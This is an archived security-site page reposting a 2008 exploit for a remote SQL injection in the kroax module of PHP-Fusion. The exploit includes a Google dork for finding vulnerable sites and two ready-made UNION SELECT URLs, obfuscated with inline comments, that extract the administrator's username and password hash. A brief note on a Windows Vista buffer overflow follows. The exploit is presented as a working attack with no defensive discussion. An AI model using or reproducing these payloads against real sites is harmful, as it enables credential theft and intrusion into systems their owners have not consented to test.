|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 4206 Milw0rm ID : 5942 Credit : boom3rang Date : 28.6.2008 Exploit Code : ========================================================== The kroax php_fusion Remote SQL-injection. ========================================================== ################################## Author : boom3rang Contact : boomerang@knaqu-shqipe.de webpage : www.khg-crew.ws ################################## --- Remote SQL Injection --- [+]Google Dork: inurl:"kroax.php?category" -------------- Exploit -------------- example: www.site.com/infusions/the_kroax/kroax.php?category= [SQL] [+] username: www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/a ll/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/use r_id=1--&boom3rang [+] password: www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/a ll/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/** /user_id=1--&boom3rang\ ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password. ========================================================== Greetz to: All my Albanian brothers ========================================================== |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |